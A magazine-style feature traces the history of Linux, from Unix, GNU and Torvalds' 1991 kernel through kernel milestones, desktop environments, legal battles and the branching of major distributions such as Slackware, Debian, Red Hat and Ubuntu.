Let's be clear: a 21-year-old, barely able to afford an Intel 386 DX33, was about to start a development process that would support a software ecosystem, which in turn would run most of the smart devices in the world, a majority of the internet, all of the world's fastest supercomputers, chunks of Hollywood's special effects industry, SpaceX rockets, NASA Mars probes, self-driving cars, tens of millions of SBCs like the Pi and a whole bunch of other stuff. How the heck did that happen? Turn the page to find out...

“A 21-year-old, barely
able to afford an Intel 386
DX33, was about to start
a development process
that would support a
software ecosystem...”




Pre-Linux development
Discover how Unix and GNU became the foundation of Linus Torvalds’ brainchild.

To understand how Linux got started, you need to understand Unix. Before Linux, Unix was a well-established operating system standard through the 1960s into the 1970s. It was already powering mainframes built by the likes of IBM, HP, and AT&T. We're not talking small fry, then - they were mega corporations selling their products around the globe.
If we look at the development of Unix, you'll see certain parallels with Linux: freethinking academic types who were given free rein to develop what they want. But whereas Unix was ultimately boxed into closed-source corporatism, tied to a fixed and dwindling development team, eroded by profit margins and lawyers' fees, groups that followed Linux embraced a more strictly open approach. This enabled free experimentation, development and collaboration on a worldwide scale. Yeah, yeah, you get the point!
Back to Unix, which is an operating system standard that started development in academia at the end of the 1960s as part of MIT, Bell Labs and then part of AT&T. The initially single or uni-processing OS, spawned from the Multics OS, was dubbed Unics, with an assembler, editor and the B programming language. At some point that "cs" was swapped to an "x," probably because it was cooler, dude.
At some point, someone needed a text editor to run on a DEC PDP-11 machine. So, the Unix team obliged and developed roff and troff, the first digital typesetting system. Such unfettered functionality demanded documentation, so the "man" system (still used to this day) was created with the first Unix Programming Manual in November 1971. This was all a stroke of luck, because the DEC PDP-11 was the most popular mini-mainframe of its day, and everyone focused on the neatly documented and openly shared Unix system.
In 1973, version 4 of Unix was rewritten in portable C, though it would be five years until anyone tried running Unix on anything but a PDP-11. At this point, a copy of the Unix source code cost almost $100,000 in current money to licence from AT&T, so commercial use was limited during the 70s. However, by the early 80s costs had rapidly dropped and widespread use at Bell Labs, AT&T, and among computer science students propelled the use of Unix. It was considered a universal OS standard, and in the mid-1980s the POSIX standard was proposed by the IEEE, backed by the US government. This makes any operating system following POSIX at least partly if not largely compatible with other versions.

> Ken Thompson (left) and Dennis Ritchie are credited with largely creating much of the original UNIX family of operating systems, while Ritchie also created the C language.
Linux runs everything


Developing software for supercomputers is expensive. During the 1980s, Cray was spending as much on software development as it was on its hardware. In a trend that would only grow, Cray initially shifted to UNIX System V, then a BSD-based OS, and eventually, in 2004, SUSE Linux to power its supercomputers. This was matched across the sector, and the top 500 supercomputers (www.top500.org) now all run Linux.
Internet services have also all been developed to run on Unix systems. Microsoft and BSD systems do retain a good slice of services, but over 50 per cent of web servers are powered by Linux. Recent moves to virtual services with container-based deployment are all Linux-based. Microsoft's cloud service Azure reports that Linux is its largest deployment OS and, more to the point, Google uses Linux to power most of its services, as do many other service suppliers, aka AWS.
Android's mobile OS share dropped in 2020 to just 84 per cent - it's powered by Linux. Google bought the startup that was developing Android in 2005. LineageOS (https://lineageos.org) is a well-maintained fork of Android and supports most popular handsets well after their manufacturers abandon them.
Space was thought to be Linux's final frontier, because it's not a certified deterministic OS, which is the gold standard for real-time OSes in mission-critical situations. Turns out that SpaceX rockets use Linux to power their flight systems, using a triple-redundancy system, while NASA has sent Linux to Mars in its helicopter drone, Ingenuity. Tesla is also reportedly running Linux in its cars.
Linux has also been at the heart of Hollywood's special effects since 1997's Titanic used a Linux server farm of DEC Alphas at Digital Domain to create its CGI. DreamWorks' Shrek in 2001 was the first film that was entirely created on Linux systems. Meanwhile, Pixar ported its Renderman system to Linux from SGI and Sun servers around 2000, in time to produce Finding Nemo in 2003.




> Linus Torvalds being interviewed by Linux Format back in 2012.

At the end of the 1980s, the Unix story got messy, with commercial infighting, competing standards and closing off of standards, often dubbed Unix Wars. While AT&T, Sun Microsystems, Oracle, SCO, and others argued, a Finnish boy was about to start university...

We GNU
Before we dive into the early world of Linux, there's another part of the puzzle of its success that we need to put in place: the GNU Project, established by Richard Stallman. Stallman was a product of the 1970s development environment: a freethinking, academic, hippy type. One day, he couldn't use a printer, and because the company refused to supply the source code, he couldn't fix the issue - supplying source code was quite normal at the time. He went apoplectic and established a free software development revolution: an entire free OS ecosystem, free software licence and philosophy that's still going strong. Take that, proprietary software!
The GNU Project was established by Stallman in 1983, with GNU being a hilarious (to hackers, at least) recursive acronym for "GNU is Not Unix." Geddit? Its aim was to establish a free OS ecosystem with all the tools and services a fully functioning OS requires. Do keep in mind that most of the tools created then are still being used and maintained today.
By 1987, GNU had established its own compiler, GCC, the Emacs editor, the basis of the GNU Core Utilities (basic file manipulation tools such as list, copy, delete and so on), a rudimentary kernel and a chess engine (see LXF273). But more importantly, Stallman had cemented his ideal of software freedom with the 1989 "copyleft" GPL software licence, and his manifesto setting out the four software freedoms enabling users to run, study, modify and distribute any software - including the source - for any reason.
The GPL remains the strongest copyleft licence, and while it has perhaps fallen out of vogue, it's still regarded as the best licence for true open-source development, and cements most Linux distros. GCC is still an industry standard, Emacs remains a feature-rich development environment, and the GNU Core Utilities are still widely used in certain POSIX systems and most Linux distros.
You could argue that without the GNU Project being established, Linux would never have taken off. The GPL licence (adopted early on in Linux development) forces all developers to share back their enhancements to the source code. It's a feedback loop that promotes shared improvements. Alternative open-source licences enable corporations to take source code and never share back improvements, meaning the base code is more likely to remain static.

"He established a free software development revolution: an entire free OS ecosystem, free software licence and philosophy that's still going strong."

> Linux Format interviewed Richard Stallman, the creator of the GNU free software movement, in 2011.

The Hacker's Manual | 21


Distros
developers that grew up studying and using Unix,
looking to contribute to a truly freed open-source OS.

Let’s all Freax out!


> We have to mention Tux, the mascot of Linux, because a penguin once bit Linus. True story!

We're getting ahead of ourselves. Linus Torvalds had his Intel 386, was studying computer science at the University of Helsinki, and was using the MINIX 16-bit OS and kernel. MINIX is a POSIX-compatible Unix-like OS and micro-kernel. In 1991, it had a liberal licence, costing just $69, offering the source code but restricting modification and redistribution.
We imagine the 16-bit limitation spurred Torvalds to create his own 32-bit kernel, but he states the licence restrictions were also key. So, on 25 August 1991, he posted to comp.os.minix that he was developing his own free OS. He said that it was "nothing professional like GNU," and it'd only support AT disks, as that's all he had.

> Minix, for all of its creator's protestations to its superiority, has ceased development, even though it runs Intel's CPU Management Engine.

This was developed on a MINIX system, compiled on GNU GCC, and he'd ported GNU bash. Torvalds had planned to call his OS Freax, combining "Free," "Freak" and "Unix," but once he'd uploaded it to ftp.funet.fi, a volunteer admin (Ari Lemmke) renamed it Linux, as he thought it was better. So, version 0.01 of Linux was released to the world in September 1991. One telling part of the release notes states: "A kernel by itself gets you nowhere. To get a working system you need a shell, compilers, a library, etc... Most of the tools used with Linux are GNU software and are under the GNU copyleft. These tools aren't in the distribution - ask me (or GNU) for more info."
Importantly, this outlines Linux's reliance on other GPL-licenced tools, and shows the use of the term "distribution," now shortened to "distro." As Torvalds points out, an operating system isn't a kernel alone; it's a collection of tools, scripts, configs, drivers, services and a kernel, lumped together in an easier form for users to install and use.
As for the licence, Torvalds initially used his own, which restricted commercial use, but by January 1992 he'd been asked to adopt the GPL, and had stated the kernel licence would change to align it with the other tools being used. It was December 1992, and for the release of v0.99, the Linux kernel was GPLv2-licenced. This cemented the legal clause that anyone using the kernel source has to contribute back any changes used in published code.

Birth of The Linux Foundation


Open Source Development Labs was set up at the turn of the millennium to, among other things, get Linux into data centres and communication networks. They became Torvalds' (and his right-hand man Andrew Morton's) employer in 2003. Prior to this he was employed by Transmeta, who permitted him to continue kernel development alongside his other work. Five years previous, another consortium, the Free Standards Group, had been set up. By 2007 its work was mostly driving people to switch to Linux, and the two groups merged to form the Linux Foundation (LF). Today the LF's Platinum members include Facebook, Microsoft, Tencent, IBM and Intel, all of whom contribute (besides the half a million dollars required for Platinum status) a great deal of code to the Kernel. In 2012, when Microsoft wanted to get Linux working on its Azure cloud, they were for a time the biggest contributor.
Besides funding the Kernel, the LF hosts hundreds of other open source projects, including Let's Encrypt, the OpenJS Foundation and the Core Infrastructure Initiative, which aims to secure the software which underpins the internet. But it's not all code and corporations. There's conferences too, and it's thanks to the Linux Foundation that we've been able to provide interviews and coverage from the annual Open Source Summit. We look forward to conference season resuming, so we can get back to the snack bars and coffee counters.


Early kernel development


Refining the very heart of Linux hasn’t been an easy ride over the years...
Are you a recent Linux convert who's had to engage in combat with rogue configuration files, misbehaving drivers or other baffling failures? Then spare a thought for those early adopters whose bug reports and invective utterances blazed the trail for contemporary desktop Linux. Up until comparatively recently, it was entirely possible to destroy your monitor by feeding X invalid timing information. Ever had problems with Grub? Try fighting it out with an early version of Lilo.
In the early days, even getting a mouse to work was non-trivial, requiring the user to do all kinds of manual calibration. Red Hat released a tool called Xconfigurator that provided a text-mode, menu-driven interface for setting up the X server. It was considered a godsend, even though all it did was generate an XF86Config file which otherwise you'd have to write yourself.
So while in 2000 users whined about Windows Me being slow and disabling real-mode DOS, your average Linux user would jump for joy if their installation process completed. Even if you got to that stage, it would be foolishly optimistic to suppose the OS would boot successfully. Hardware detection was virtually non-existent, and of the few drivers that had been written for Linux, most weren't production quality. Yet somehow, the pioneers persisted - many were of the mindset that preferred the DOS way of working, which began to be sidelined as the millennium approached. Windows users were having their files abstracted away - 'My Computer' epitomises this movement.
In January 2001 Kernel 2.4 was released and with it came support for USB and the exciting new Pentium IV processors, among other things. It was of particular importance to desktop users thanks to its unified treatment of PCI, ISA, PC Card and PnP devices as well as ACPI support. The dot-com bubble was just about to burst, but all the excitement and speculation around it meant that many computer enthusiasts had a broadband connection in their home, and some even enjoyed the luxury of owning more than one computer.

> The Human theme was an attempt to make Ubuntu Linux more friendly, because as everyone knows brown is beautiful, especially if you're a warthog.

User-unfriendly Linux
This solved some major entry barriers to Linux: people could now download it much more easily; up-to-date documentation was easily accessible; and when Linux saw fit to disappear one's internet connection (or render the system unbootable), the other machine could be used to seek guidance. But the user experience was still, on the whole, woefully inhospitable. While some installers had evolved graphical capabilities, these more often than not were more trouble than they were worth. Users were expected to understand the ins and outs of

disk partitioning, and be able to discern which packages they required from often terse descriptions.
Windows XP was released in October 2001, and while this was seen as a vast improvement over its predecessor, many users found that their machines weren't up to running it. After all, it required 64MB RAM and a whopping 1.5GB of disk space. Remember that BIOSes had only recently gained the ability to address large drives (there were various limits, depending on the BIOS; 2.1, 4.2 and 8.4GB were common barriers), so many people couldn't install it on their hardware, and many that met the minimum specs found the desktop performance rapidly degraded once the usual pantheon of office suites and runtime libraries were installed.
This provided the motivation for another minor exodus to Linux, and the retro-hardware contingent continue to make up a key part of the Linux userbase (and berate us for not including 32-bit distros). Before 2006 all Macs had PowerPC processors, and many of these (as well as early Intel Macs), long-bereft of software updates from Apple, now run Linux too.

Gnome makes an appearance
The Gnome 2 desktop environment was released in 2002 and this would become a desktop so influential that some still seek (whether out of nostalgia, atavism or curmudgeonly dislike of modern alternatives) to reproduce it. It aimed to be as simple, tweakable and intuitive as possible, and it's hard to argue against its achieving all of these adjectives. One of the major enablers was its strict adherence to the Gnome Human Interface Guidelines, which set out some key principles for application designers. This meant the desktop was consistent not just internally, but in respect to all the GTK apps that people would go on to write for it.
Also released was KDE 3, which vaguely resembled Windows - in that it was cosmetically similar and slightly more resource-demanding than Gnome. People and distributions sided with one or the other. SUSE Linux (predecessor of openSUSE) always aimed to be agnostic, but went KDE-only in 2009. Today it caters to both Gnome and KDE.
In late 2002, 'DVD' Jon Johansen was charged over the 1999 release of the DeCSS software for circumventing the Content Scrambling System (CSS) used on commercial DVDs. This software enabled Linux users to play DVDs, a feat they had been hitherto unable to do since DVD software required a licence key from the DVD Copy Control Agency, one of the plaintiffs in the suit. It later emerged that CSS could be broken much more trivially and Johansen was eventually acquitted. By this time iPods and piracy meant that MP3 files were commonplace. These were dogged by patent issues with a number of bodies asserting ownership of various parts of the underlying algorithm. As a result, many distros shipped without patent-encumbered multimedia codecs. The law is murky

Big Business vs Linux


Being the root of all evil, whenever money is involved, things can turn nasty. So, when the big players in the enterprise and business markets began to see Linux distros as a threat, lawyers were called.
A series of leaked Microsoft memos from August 1998, known as the Halloween Documents for the date they were released, detailed Microsoft's private worries that Linux, and open-source development in general, was a direct threat to its business, along with ways to combat its uptake. This private view was in direct conflict with the company's public line on the matter, though Steve Ballmer infamously called Linux a cancer in 2001. The documents are available at www.catb.org/~esr/halloween, and in them Microsoft predicted that "Linux is on track to eventually own the x86 UNIX market..."
It was correct. There was little Microsoft could do to combat Linux, as it couldn't be bought. The documents suggested extending open protocols with Microsoft's own proprietary extensions (which didn't work), and seeding the market with fear, uncertainty and doubt (FUD) also failed. There was another angle, however: help a company that's suing over copyright infringement of the source code. In 2003, a company called SCO claimed part of its UNIX System V source code was being used within Linux, making it an unauthorised derivative of UNIX. SCO sued IBM for $1 billion (among many other companies), and demanded end users pay a Linux licence fee. Microsoft leaped into action and paid SCO $106 million, as detailed in a leaked and verified SCO memo. After years of legal arguments, a code audit found there to be no evidence of copied UNIX code in the Linux kernel. SCO went bankrupt in 2009, but parts of the lawsuit still rumble on.

25 August 1991 - Linus announces on comp.os.minix: Linus Torvalds, a 21-year-old student at the University of Helsinki, Finland, starts toying with the idea of creating his own clone of the Minix OS.
17 September 1991 - v0.01 posted on ftp.funet.fi: This release includes Bash v1.08 and GCC v1.40. At this time, the source-only OS is free of any Minix code and has a multi-threaded file system.
November 1991 - v0.10 Linux is self-building: Linus overwrites critical parts of his Minix partition. Since he couldn't boot into Minix, he decided to write the programs to compile Linux under itself.
5 January 1992 - v0.12 GPL licenced: Linux originally had its own licence to restrict commercial activity. Linus switches to GPL with this release.
Elsewhere: 1991 - Python; May 1992 - Softlanding Linux System.


though, and rights holders have shown restraint in filing suit against FOSS implementations of these codecs. Most distros are prudent and leave it up to the user to install these, although Ubuntu and derivatives will do so if you tick a box. The MP3 patent expired in 2017, though it doesn't really matter - we have plenty of open formats and codecs now (OGG, FLAC, VPx and x264). It's still technically a DMCA violation to use libdvdcss (a modern and much more efficient way of cracking CSS, used by the majority of media players on Linux) to watch a DVD, but that only applies in some countries and to date, no one has challenged its use.

> The LiMux project branded Tux with Munich's emblem, the Münchner Kindl. Apparently it didn't hurt a bit. The project is estimated to have saved around €11 million.

Early kernel development


As Linux gained traction, first among academics and hobbyists and then, by the mid-90s, when businesses started to form around it, the number of contributors bloomed. One take from Linus himself is that once the X Windows System was working on Linux (with v0.95) it became much more appealing. So one could infer that even in 1992 people were afraid of the command line.
This popularity led to the establishment of the maintainer hierarchy, so that patches submitted could be reviewed and promoted efficiently to Linus' source tree - though that first version of the MAINTAINERS file describes Linus as "buried alive in email".
The email-centric development process is still followed today, except that the Official Linux Kernel Mailing List was set up in 1997, and now Git is used for version control. So it's a lot easier to make sure you're working on an up-to-date branch, rather than having to wait for floppies in the mail. Patches are still generated using diff -u to show which lines have been changed in which files. Before Git, the proprietary BitKeeper concurrent versioning system (CVS) was used. And when this arrangement came to an end (helped by Andrew Tridge's reverse engineering mischief), Torvalds got hacking and 10 days later there was Git.
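If you've never produced a patch this way, a minimal sketch of the workflow looks something like the following - the file name is purely illustrative, not taken from any real submission:
$ cp kernel/sched/fair.c kernel/sched/fair.c.orig      # keep a pristine copy of the file you intend to change
$ nano kernel/sched/fair.c                              # make your edit
$ diff -u kernel/sched/fair.c.orig kernel/sched/fair.c > my-change.patch
The -u flag produces the unified format - a few lines of context around each added or removed hunk - which is what maintainers expect to read.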
After two years in development Kernel 2.6 was released in 2003. This was a vastly different beast to 2.4, featuring scheduler enhancements, improved support for multiprocessor systems (including hyperthreading, NPTL and NUMA support), faster I/O and a huge amount of extra hardware support. We also saw the Physical Address Extension (PAE) so that 32-bit machines could address up to 64GB of RAM (before, they were limited to about 3.2GB). Also introduced was the venerable Advanced Linux Sound Architecture (ALSA) subsystem. This enabled (almost) out-of-the-box functionality for popular sound cards, as well as support for multiple devices, hardware mixing, full-duplex operation and MIDI. The most far-reaching new feature was the old device management subsystem, devfs, being superseded by udev. This didn't appear until 2.6.13 (November 2003), at which point the /dev directory ceased to be a list of (many, many) static nodes and became a dynamic reflection of the devices actually connected to the system. The subsystem udev also handled firmware loading and userspace events, and contributed to a much more convenient experience for desktop users, although you still relied on such arcana as HAL and ivman in order to automount a USB stick with the correct permissions. Linux (having already been ported to non-x86 64-bit processors) supported the Itanium's IA64 instruction set when it was released in 2001. This architecture was doomed to fail though, and Intel eventually moved to the more conservative AMD64 (or x86-64) architecture, which has been around since 2003.

"The venerable Advanced Linux Sound Architecture (ALSA) subsystem enabled (almost) out-of-the-box functionality for popular sound cards."

7 March 1992 - v0.95 X Windows: A hacker named Orest Zborowski ports X Windows to Linux.
14 March 1994 - v1.0.0 C++ compiled: The first production release. Linus had been overly optimistic in naming v0.95, and it took about two years to get version 1.0 out the door.
7 March 1995 - v1.2.0 Linux '95: Portability is one of the first issues to be addressed. This version gains support for computers using processors based on the Alpha, SPARC and MIPS architectures.
9 June 1996 - v2.0.0 SMP support: Symmetric multiprocessing (SMP) is added, which made it a serious contender for many companies.
20 February 2002 - v2.5.5 64-bit CPUs: AMD 64-bit (x86-64) and PowerPC 64-bit are now supported.
Elsewhere: March 1992 - 386BSD; April 1996 - Apache HTTP; Sept 2002 - Blender.

Thanks to open source development, Linux users were running 64-bit desktops right away, while Windows users would have to wait until 2005 for the x64 release of XP. Various proprietary applications (notably Steam and lots of its games) run in 32-bit mode, which provides some motivation for distributions to maintain at least some 32-bit libraries.
Debian 11 will support 32-bit x86 in some form until 2026, but most other distros have abandoned it. Eventually such machines will go the way of the 386, no longer supported on Linux since 2013.

Enter the archetype
In 2004, a sound server called Polypaudio was released by a hitherto unknown developer called Lennart Poettering and some others. At this time desktop environments relied on sound servers to overcome shortcomings in ALSA's dmix system: Gnome was using the Enlightened Sound Daemon (ESD) and KDE was using the analogue Realtime synthesizer (aRts). Polypaudio was designed to be a drop-in replacement for ESD, providing much more advanced features, such as per-application volume control and network transparency. In 2006 the project, citing criticism that nobody wants polyps, renamed itself PulseAudio (it was in fact named after the sea-dwelling creature).
With its new name and increased demand for a sound system comparable with that of OSX or the newly released (and much maligned) Windows Vista, PulseAudio enjoyed substantial development and began to be considered for inclusion in many distros. As is traditional, Fedora was the first to adopt, incorporating it as the default in version 8, released in late 2007. Ubuntu followed suit in 8.04, although its implementation attracted much criticism and resulted in much anti-Pulse vitriol. Poettering at one stage even described his brainchild as "the software that currently breaks your audio." It took some time but eventually Ubuntu (and other distros) sorted out implementation issues, and it mostly worked out of the box. Now we have Pipewire in the works for a new generation of audio-based rage against the machine.

> Asus' EeePC Linux was based on Xandros and IceWM, but beginners didn't like it, and professionals just replaced it.

The cost of progress
The year 2010 may be remembered by some as the one Ubuntu started to lose the plot. Its Ubuntu Software Center now included paid-for apps and the Netbook remix used a new desktop called Unity. In the 11.04 release though, this became the new shell for the main release too. Ubuntu had long taken issue with the new Gnome 3 desktop, which at the time of the Ubuntu feature-freeze was not considered stable enough to include in the release anyway, and Gnome 2 was already a relic. So in a sense Ubuntu had no choice, but no one likes change, and users were quick to bemoan the new desktops. Of course things have come full circle with Ubuntu using Gnome 3 once more since 20.04 and people bemoaning the loss of Unity.
Gnome 3 is not without controversy too. First, many preferred the old Gnome 2 way of doing things and this clearly was not that. Second, all the fancy desktop effects required a reasonable graphics card (and also working drivers). There was a fallback mode, but it severely crippled desktop usability. Finally, this appeared to be something designed for use on mobiles or tablets, yet even today mobile Linux (not counting Android) has never taken off, so why should users be forced into this mode of thinking? Many found, though, that once some old habits were unlearned and some sneaky keyboard shortcuts were learned (and Gnome's Tweak Tool was installed), the Gnome 3 way of working could be just as efficient, if not more so, than its predecessor. KDE users looked on smugly, having already gone through all the rigmarole of desktop modernisation (albeit less drastic than Gnome's) when KDE 4 was released in 2008.
Around this point we ought to mention Systemd as well, but there's not much to say that hasn't been said elsewhere: the old init system was creaking at the seams; a new and better one came along; it wasn't everyone's cup of tea, but we use it anyway; the internet slanders Lennart Poettering.

17 December 2003 - v2.6.0 The Beaver Detox: Major overhaul to Loadable Kernel Modules (LKM). Improved performance for enterprise-class hardware, the Virtual Memory subsystem, the CPU scheduler and the I/O scheduler.
29 November 2006 - v2.6.19 ext4: Experimental support for the ext4 filesystem.
5 February 2007 - v2.6.20 KVM arrives: The Kernel-based Virtual Machine (KVM) is merged, adding support for Intel and AMD hardware virtualisation extensions.
25 December 2008 - v2.6.28 Graphics rewrite: The Linux graphics stack was fully updated to ensure that it utilised the full power of modern GPUs.
Elsewhere: April 2003 - Firefox; August 2006 - Linux Mint; September 2008 - Chromium.


Distro developments
A single kernel has enabled a good number of
Linux distributions to blossom into life.
After looking into the development of the Linux kernel itself and the surrounding supporting software, let's turn to how Linux distributions (distros) from this point were developed and branched into a wide-ranging ecosystem.
Distros enabled the use of the Linux kernel to grow rapidly. Not only did they ease the installation of Linux (which early on was a complex process of source compilation, gathering the right tools, creating filesystem layouts by hand, and bootloaders, all from the terminal on systems with limited resources), but one distro can also become the base for a whole new distro, tailored for a new use or audience.

Primordial soup
> The first Linux distro, aptly named: Linux 0.12.

As Linux v0.01 was only released in September 1991, the first distribution of Linux - though by modern standards it's lacking in every department - created by HJ Lu, was simply called Linux 0.12. Released at the end of 1991, it came on two 5.25-inch floppy disks, and required a HEX editor to get running. One disk was a kernel boot disk, the other stored the root OS tools.
In those early days of distro evolution, things changed rapidly. Development was quickly adding base functionality, and people were trying out the best ways to package a Linux-based OS. MCC Interim Linux was released in February 1992 with an improved text-based installer, and was made available through an FTP server. X Windows - the standard Unix windowing system - was ported, and TAMU Linux was released in May 1992 with it packaged, making it the first graphical distro.
While all of these are notable as being among the first Linux distros, they didn't last. The same can be said for Softlanding Linux System (SLS), also released in May 1992, which packaged X Windows and a TCP/IP network stack. It's notable, though, because its shortcomings (bugs and a change to the executable system) inspired the creation of the two longest-running and, in many ways, most influential Linux distros: Slackware and Debian.
Nowadays, a number of base distros appear, reliably maintained by individuals, groups, or businesses. Once they're established, stable and become popular, offshoots branch from these root distros offering new specialisations or features. This creates a number of base distro genera, formed around the original package manager and software repositories.
The effect is a Linux family tree (see page 43), where you can date all distros back to an initial root release. Some branches sprout and die: either the group maintaining it disbands or there's no wider interest. Some branches become so popular they create a whole new genus, becoming the basis for a further expansion.

Evolution, not revolution
As with plants and animals, offshoots inherit traits, the base install, package manager, and software repositories being key. A package manager is how the OS installs, updates, removes and maintains the installed software, which includes downloading software packages from the managed software servers, called repositories. This can become contentious - these child distros are leeching off the parent's bandwidth - but initially, while they're growing, this use won't look much different from normal user activity.
Bear in mind we're back in 1992. You're lucky if

21 July 2011 - v3.0 20 years young: This version bump isn't about major technological changes, but instead marks the kernel's 20th anniversary.
18 March 2012 - v3.3 EFI boot support: An EFI boot stub enables an x86 bzImage to be loaded and executed directly by EFI firmware.
12 April 2015 - v4.0 Hurr Durr I'ma Sheep released: Linus Torvalds decides to poll the decision to increment the next release to 4.x. The poll also approved the name.
March 2019 - v5.0 Shy Crocodile: Major additions (across the 5.x series) include WireGuard, USB 4, the 2038 fix, Spectre fixes, RISC-V support, exFAT, AMDGPU and so much more!
2021... - v6+ The future...: Who knows what the next 30 years has in store for Tux. Watch this space - and keep reading Linux Format!
Elsewhere: September 2010 - LibreOffice; 2015 - Microsoft Loves Linux.


there's a 14.4Kb/s dial-up modem at home: expensive T1 lines (1.54Mb/s) are limited to academic institutions and larger businesses. The early TAMU v1.0 distro required 18 disks for the 26MB binaries, and 35 disks for the 50MB compressed (200MB uncompressed) source code. This obviously limited access in these early days to academics and those in suitable businesses, so distro evolution was slow.

Meet the ancestors
Softlanding Linux System was popular, but it was buggy and badly maintained, so in July 1993, Patrick Volkerding forked SLS and created Slackware - so named because it wasn't a serious undertaking at the time, and was a reference to the Church of the SubGenius. This is the oldest Linux distro still maintained, and it's about to see its version 15 release after 28 years. Slackware is interesting because it's very much controlled and maintained by Volkerding, while followed by a small but enthusiastic band of users and contributors. Whereas many other distros have taken on modern enhancements, Volkerding sticks to older, more traditional "Unix" ways of controlling services on Slackware. There's no formal bug tracking, no official way to contribute to the project, and no public code repository. This all makes Slackware very much an oddity that stands on its own in the Linux world. Due to its longevity, however, Slackware has attracted a couple of dozen offshoots, and at least half are still maintained today.

> Thankfully, by being buggy, SoftLanding Linux System kickstarted some good distros! CREDIT: Linuxcenter.ru

In August 1993, Ian Murdock, also frustrated by Softlanding Linux System, established Debian, a combination of "Debby," his girlfriend's name at the time, and "Ian." From the outset, it was established as a formal, collaborative open project in the spirit of Linux and GNU.
Early on in the Debian project, Bruce Perens maintained the base system. He went on to draft a social contract for the project and created Software in the Public Interest, a legal umbrella group to enable Debian to accept contributions. At the time, Perens was working at Pixar, so all Debian development builds are named after Toy Story characters. The Debian logo also has a strong similarity to the mark on Buzz Lightyear's chin.
Debian is arguably the single most influential and important Linux distro ever. Just the sheer number of branches of distros from it would attest to that, but Debian is renowned for its stability, high level of testing, dedication to software freedom, and being a rigorously well-run organisation. It's testament to its creator, Ian Murdock, who sadly passed away in December 2015.
Things were still moving slowly into 1994 - there was just a single Slackware fork called SUSE, and a few random Linux sprouts appeared but all died out. Then

The Raspberry Pi
The Raspberry Pi was released in 2012. Inspired in part by the success of the BBC Micro (hence the monogram model names) in the early 1980s, the Raspberry Pi aimed to bring practical computer science to the classrooms and bootstrap the UK electronics industry. It was only ever expected to have been produced in the thousands. Of course, when it was launched, Linux was the de facto OS of choice.
While many of these devices are now empowering young coders, a great deal have become part of diverse man-cave projects: the 30-somethings who cut their teeth on BBCs, Spectrums and Commodore 64s are reliving and reviving the thrills at the interface of coding and creativity. The Raspberry Pi's GPIO pins mean that all manner of add-ons have been developed, so that the pint-sized computer can power anything from robots to remote watering systems.
The lingua franca of Pi projects is Python which, like Basic, is easy to learn. Unlike Basic, though, it's consistent, extensible and won't need to be unlearned should users move on to more advanced languages. The Pi's support for 3D graphics is impressive, but CPU-wise it's more limited. The original Pis struggle to function as a desktop computer, even with the modest Raspbian distribution (although recent work on the Epiphany web browser has improved this).
In 2015 the Pi received the Pi 2 reboot, gaining a quad-core processor and extra RAM, and yet still only cost £25. Jump forward six years and we have the Pi 4 in its various forms, including a full-desktop capable 8GB version, the Pi 400, a range of industry-friendly models and over 30 million sales. Splendid.


in October 1994, Red Hat Linux was publicly released. Red Hat was established as a for-profit Linux business, initially selling the Red Hat Linux distribution and going on to provide support services. Red Hat went public in 1999, achieving the eighth biggest first-day gain in the history of Wall Street. It entered the NASDAQ-100 in December 2005 and topped $1 billion annual revenue in 2012. IBM purchased Red Hat in October 2018 - 24 years after its first release - for $34 billion. So that worked out very well.

A tale of hats and forks
Red Hat Linux was relaunched as Red Hat Enterprise in 2001, and its commercial success attracted a wide range of forks. Notably, Red Hat directly supports Fedora as its testing distro and CentOS as its free community edition. Or it did. CentOS is being shuttered - to understandable community disdain - and a rolling release, CentOS Stream, is replacing it. As an alternative, Red Hat Enterprise is now offered freely to community projects with fewer than 16 servers.
Meanwhile in Germany, SUSE (Software und System Entwicklung) started life as a commercially sold German translation of Slackware in late 1992. In 1996, an entire new SUSE distro and business was launched, based on the Dutch Jurix Linux, selling the new distro and support services.
SUSE was purchased by Novell in 2003, and in 2005 the openSUSE community edition was launched, while SUSE Linux Enterprise was developed in tandem for its commercial arm. SUSE was acquired in 2018 for $2.5 billion and returned double-digit growth through 2020, with a revenue of over $450 million. Yet despite its success, SUSE and openSUSE have only ever attracted a couple of forks. We could be wrong when we say this is possibly down to their European roots.

It's a distro inferno
Between the creation of Red Hat in 1994 and 2000, there were a number of Red Hat spin-offs, because at that point there was clear commercial interest in Linux. Throughout this period, Linux was best suited to business server tasks, where much of the open-source Unix work had been focused. However, by the end of the 1990s, 56k modems had become commonplace, early home broadband was just appearing, and modern graphical desktops were in development. Linux was about to get a whole new audience.

"Debian is renowned for its stability, high level of testing, dedication to software freedom, and being a rigorously well-run organisation."

> Debian is the distro that launched more distros than any other!
> The late Ian Murdock founded the influential Linux distribution Debian in 1993. Linux Format spent time talking with him in 2007.
CREDIT: Based on the LinuxTimeLine by fabiololix, GNU Free Documentation License v1.3, https://github.com/FabioLolix/LinuxTimeline/tree/master


One early example was Mandrake Linux, in mid-1998. A fork of Red Hat, it was crazily aimed at making Linux easy to use for new users, using the new Kool Desktop Environment (KDE). The French/Brazilian development team gained a lot of attention but, ultimately, financial problems closed the project in 2011. However, its spirit continues in the excellent but less well-known Mageia and OpenMandriva projects.

A distro with humanity in mind
With Mandrake pointing the way, the early 2000s saw an explosion of distro releases. The Debian project at this point was well established, well regarded and well known, and it became the basis for hundreds of Linux distros. But we'll only mention one: Ubuntu, released in 2004 by South African millionaire Mark Shuttleworth, who jokingly calls himself the self-appointed benevolent dictator for life. The Ubuntu Foundation was created in 2005 as a philanthropic project - Ubuntu is a Zulu word meaning humanity - to provide quality open-source software, with Canonical as the supporting commercial arm.
Ubuntu as a branch of Debian has itself seen over 80 distros fork from it, while Ubuntu has the highest share of all desktop Linux installs - though this is notoriously hard to measure - when users are polled. Why Ubuntu became so popular is hard to fully pinpoint. Key is that, just like Mandrake before it, Ubuntu set out to make desktop Linux easy for first-time users. It also offered the distro on free CDs via its ShipIt service until 2011, alongside fast, reliable server downloads. Furthermore, it was based on the popular Debian, it jumped on the new, slick Gnome desktop, and it set out a regular six-month release cycle, with a Long Term Support release every two years. Support was for 18 months (now nine months) for regular releases, and 36 months for LTS ones (now five years).
Ubuntu also offered great forums and help sites, along with a community council, and support for forks such as Xubuntu, Lubuntu and many others. It had sane defaults, too, and made it easier to install display drivers (an absolute pain 10-plus years ago), while offering a huge catalogue of tested, ready-to-run open-source software and dedicated server builds. We guess when you say all this out loud, it sounds pretty compelling!
